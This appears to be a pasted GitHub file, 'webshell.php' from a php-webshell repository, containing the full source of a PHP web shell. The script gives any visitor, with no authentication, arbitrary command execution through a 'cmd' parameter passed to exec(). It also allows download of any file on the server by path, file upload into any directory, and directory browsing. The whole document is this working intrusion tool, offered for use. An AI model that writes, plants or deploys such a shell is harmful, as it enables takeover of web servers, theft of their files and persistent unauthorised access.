· 5 years ago · Dec 21, 2020, 05:16 PM
1
2Skip to content
3
4 Why GitHub?
5
6
7 Team
8 Enterprise
9 Explore
10
11
12 Marketplace
13 Pricing
14
15
16
17Sign in
18Sign up
19drag0s /
20php-webshell
21
222
238
24
25 16
26
27 Code
28 Issues
29 Pull requests
30 Actions
31 Projects
32 Security
33 Insights
34
35php-webshell/webshell.php /
36@drag0s
37drag0s ADD feature: upload files
38Latest commit 474c3bc Sep 21, 2016
39History
401 contributor
41144 lines (122 sloc) 4.59 KB
42<?php
43
44if (isset($_GET['download'])) {
45 $file = $_GET['download'];
46 if (file_exists($file)) {
47 header('Content-Description: File Transfer');
48 header('Content-Type: application/octet-stream');
49 header('Content-Disposition: attachment; filename="'.basename($file).'"');
50 header('Expires: 0');
51 header('Cache-Control: must-revalidate');
52 header('Pragma: public');
53 header('Content-Length: ' . filesize($file));
54 readfile($file);
55 exit;
56 }
57}
58
59?>
60
61<html>
62<!-- Latest compiled and minified CSS -->
63<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
64
65<!-- jQuery library -->
66<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
67
68<!-- Latest compiled JavaScript -->
69<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
70
71<div class="container">
72
73
74<?php
75
76function printPerms($file) {
77 $mode = fileperms($file);
78 if( $mode & 0x1000 ) { $type='p'; }
79 else if( $mode & 0x2000 ) { $type='c'; }
80 else if( $mode & 0x4000 ) { $type='d'; }
81 else if( $mode & 0x6000 ) { $type='b'; }
82 else if( $mode & 0x8000 ) { $type='-'; }
83 else if( $mode & 0xA000 ) { $type='l'; }
84 else if( $mode & 0xC000 ) { $type='s'; }
85 else $type='u';
86 $owner["read"] = ($mode & 00400) ? 'r' : '-';
87 $owner["write"] = ($mode & 00200) ? 'w' : '-';
88 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
89 $group["read"] = ($mode & 00040) ? 'r' : '-';
90 $group["write"] = ($mode & 00020) ? 'w' : '-';
91 $group["execute"] = ($mode & 00010) ? 'x' : '-';
92 $world["read"] = ($mode & 00004) ? 'r' : '-';
93 $world["write"] = ($mode & 00002) ? 'w' : '-';
94 $world["execute"] = ($mode & 00001) ? 'x' : '-';
95 if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
96 if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
97 if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
98 $s=sprintf("%1s", $type);
99 $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
100 $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
101 $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
102 return $s;
103}
104
105
106$dir = $_GET['dir'];
107if (isset($_POST['dir'])) {
108 $dir = $_POST['dir'];
109}
110$file = '';
111if ($dir == NULL or !is_dir($dir)) {
112 if (is_file($dir)) {
113 echo "enters";
114 $file = $dir;
115 echo $file;
116 }
117 $dir = './';
118}
119$dir = realpath($dir.'/'.$value);
120
121$dirs = scandir($dir);
122echo "<h2>Viewing directory " . $dir . "</h2>";
123echo "\n<br><form action='".$_SERVER['PHP_SELF']."' method='GET'>";
124echo "<input type='hidden' name='dir' value=".$dir." />";
125echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
126echo "</form>";
127echo "\n<br>\n<div class='navbar-form'><form action='".$_SERVER['PHP_SELF']."' method='POST' enctype='multipart/form-data'>\n";
128echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> ";
129echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
130echo "</div>";
131
132if (isset($_POST['submit'])) {
133 $uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']);
134 if (file_exists($uploadDirectory)) {
135 echo "<br><br><b style='color:red'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";
136 }
137 else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
138 echo '<br><br><b>File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !</b><br>';
139 } else {
140 echo '<br><br><b style="color:red">Error uploading file '.$uploadDirectory.'</b><br><br>';
141
142 }
143
144}
145
146if (isset($_GET['cmd'])) {
147 echo "<br><br><b>Result of command execution: </b><br>";
148 exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult);
149 foreach ($cmdresult as $key => $value) {
150 echo "$value \n<br>";
151 }
152}
153echo "<br>";
154?>
155
156<table class="table table-hover table-bordered">
157 <thead>
158 <tr>
159 <th>Name</th>
160 <th>Owner</th>
161 <th>Permissions</th>
162 </tr>
163 </thead>
164 <tbody>
165<?php
166foreach ($dirs as $key => $value) {
167 echo "<tr>";
168 if (is_dir(realpath($dir.'/'.$value))) {
169 echo "<td><a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
170 }
171 else {
172 echo "<td><a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\n";
173 }
174 echo "</tr>";
175}
176echo "</tbody>";
177echo "</table>";
178
179
180?>
181
182
183
184</div>
185</html>
186
187 © 2020 GitHub, Inc.
188 Terms
189 Privacy
190 Security
191 Status
192 Help
193
194 Contact GitHub
195 Pricing
196 API
197 Training
198 Blog
199 About
200
201